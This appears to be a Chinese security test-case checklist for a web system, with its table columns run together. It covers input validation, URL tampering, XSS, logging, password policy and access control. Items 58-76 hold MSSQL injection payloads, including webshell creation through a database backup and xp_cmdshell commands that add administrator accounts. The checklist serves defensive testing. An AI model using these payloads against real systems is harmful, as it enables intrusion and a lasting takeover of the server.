安全性测试用例

安全性测试用例名称：CR_BI安全性测试用例测试需求点：文档结构：编码名称测试环境00综述/010203问题记录/内容/发现问题的描述及附图编号测试点测试内容1输入很大的数（如4,294,967,269），输入很小的数(负数)。2输入超长字符,如对输入文字长度有限制,则尝试超过限制,刚好到达限制字数时有何反应。3输入特殊字符如:~!@#$%^&*()_+:”{}|；;’”,｀‘：“［”｛、\|｝］+=-.。?/4输入中英文空格，输入字符串中间含空格，输入首尾空格5输入特殊字符串NULL,null，0x0d0x0a6输入正常字符串7输入与要求不同类型的字符，如:要求输入数字则检查正值,负值,零值（正零，负零）,小数,字母,空值;要求输入字母则检查输入数字8输入html和javascript代码9某些需登录后或特殊用户才能进入的页面,是否可以通过直接输入网址的方式进入；10对于带参数的网址,恶意修改其参数,(若为数字,则输入字母,或很大的数字,或输入特殊字符等)后打开网址是否出错,是否可以非法进入某些页面；11某些需登录后或特殊用户才能进入的页面,是否可以通过直接输入网址的方式进入；12对于带参数的网址,恶意修改其参数,(若为数字,则输入字母,或很大的数字,或输入特殊字符等)后打开网址是否出错,是否可以非法进入页面；13搜索页面等url中含有关键字的,输入html代码或JavaScript看是否在页面中显示或执行。14输入善意字符。15进行详单查询，检测系统是否会记录相应的操作员。16进行详单查询，检测系统是否会记录相应的操作时间。17进行详单查询，检测系统是否会记录相应的系统的状态。18进行详单查询，检测系统是否会记录相应的操作事项。19进行详单查询，检测系统是否会记录相应的IP地址等。20系统运行的时候是否会记录完整的日志21是否设置密码最小长度22用户名和密码是否可以有空格和回车？23是否允许密码和用户名一致24防恶意注册：可含用自动填表工具自动注册用户？25遗忘密码处理26在读入用户所输入的信息时，根据需要选择是否去掉前后空格27有无缺省的超级用户？28有无超级密码？29密码错误有无限制？30密码复杂性（如规定字符应混有大、小写字母、数字和特殊字符）31登录界面密码输入框中输入密码，页面显示的是*****，右键，查看源文件是否可以看见刚才输入的密码检验系统权限设置的有效性（禁用脚本调试，禁用Cookies）检验密码验证检验系统运行的时候是否会记录完整的日志检验系统URL防范非法入侵的能力32数据类型（字符串，整型，实数，等）33允许的字符集34最小和最大的长度35是否允许空输入36参数是否是必须的37重复是否允许38数值范围39特定的值（枚举型）40特定的模式（正则表达式）41对Grid、Label、Treeview类的输入框未作验证，输入的内容会按照html语法解析出来42限制用户输入值的种类43在读入用户所输入的信息时，根据需要选择是否去掉前后空格44有些读入数据库的字段不支持中间有空格，但用户切实需要输入中间空格，这时要在程序中加以处理45对可能引起致命错误或系统出错的输入字符或动作要加限制或屏蔽46应当注意尽可能避免用户无意录入无效的数据47用于需要验证用户身份以及权限的页面，复制该页面的url地址，关闭该页面以后，查看是否可以直接进入该复制好的地址48例：从一个页面链到另一个页面的间隙可以看到URL地址，直接输入该地址，可以看到自己没有权限的页面信息49排除可能会使应用非正常中止的错误50检验认证请求方式认证和会话数据是否使用POST方式，而非GET方式51登录次数限制52IE回退按钮退出系统后，点击IE回退按钮，能否重新回到系统中53是否提供自动备份机制对重要信息进行本地和异地备份；54是否提供恢复重要信息的功能；55是否提供重要网络设备、通信线路和服务器的硬件冗余；56是否提供重要业务系统的本地系统级热备份。57数据库访问限制是否应用IP过滤策略，阻止非法访问58SQL注入59;and(select@@version)0获得Windows的版本号;anduser_name()='dbo'判断当前系统的连接用户是不是sa;and(selectuser_name())0爆当前系统的连接用户;and(selectdb_name())0得到当前连接的数据库60mssql的backup创建webshellusemodelcreatetablecmd(strimage);insertintocmd(str)values('%DimoScript%');backupdatabasemodeltodisk='c:\l.asp';61添加mssql和系统的帐户;execmaster.dbo.sp_addloginusername;--62;execmaster.dbo.sp_passwordnull,username,password;--检验是否存在SQL注入数据备份和恢复检验访问控制检验输入验证63;execmaster.dbo.sp_addsrvrolemembersysadminusername;--64;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--65;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--66;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--67测试权限结构（mssql）;and1=(selectIS_SRVROLEMEMBER('sysadmin'));--;and1=(selectIS_SRVROLEMEMBER('serveradmin'));--;and1=(selectIS_SRVROLEMEMBER('setupadmin'));--;and1=(selectIS_SRVROLEMEMBER('securityadmin'));--;and1=(selectIS_SRVROLEMEMBER('diskadmin'));--;and1=(selectIS_SRVROLEMEMBER('bulkadmin'));--;and1=(selectIS_MEMBER('db_owner'));--68判断是否有注入;and1=1;and1=269判断是否是mssql;anduser070注入参数是字符'and[查询条件]and''='71搜索时没过滤参数的'and[查询条件]and'%25'='72判断数据库系统;and(selectcount(*)fromsysobjects)0mssql;and(selectcount(*)frommsysobjects)0access73数据库;and(selectCount(*)from[数据库名])074字段;and(selectCount(字段名)from数据库名)075字段中记录长度;and(selecttop1len(字段名)from数据库名)076(1)字段的ascii值（access）;and(selecttop1asc(mid(字段名,1,1))from数据库名)0(2)字段的ascii值（mssql）;and(selecttop1unicode(substring(字段名,1,1))from数据库名)0检验是否存在SQL注入预期结果实际结果输入错误。输入过长输入错误。输入错误。输入错误。输入的正确，成功登陆系统。输入错误。输入错误。系统权限设置是有效的。输入错误。不可以直接通过直接输入网址的方式进入对于带参数的网址,恶意修改其参数,(若为数字,则输入字母,或很大的数字,或输入特殊字符等)后打开网址出错，不可以非法进入页面。输入html代码或JavaScript看是不会在页面中显示或执行。正常进入页面。系统会记录相应的操作员。系统会记录相应的操作时间。系统会记录相应的系统的状态。系统会记录相应的操作事项。系统会记录相应的IP地址。系统运行的时候会记录完整的日志是不可以否不可以是是无无有有不能看到对输入有控制对输入有控制对输入有控制对输入有控制对输入有控制对输入有控制对输入有控制对输入有控制对输入有控制对输入有控制不能进入采用POST方式无效无效问题类型严重级别ticket编号描述bug截图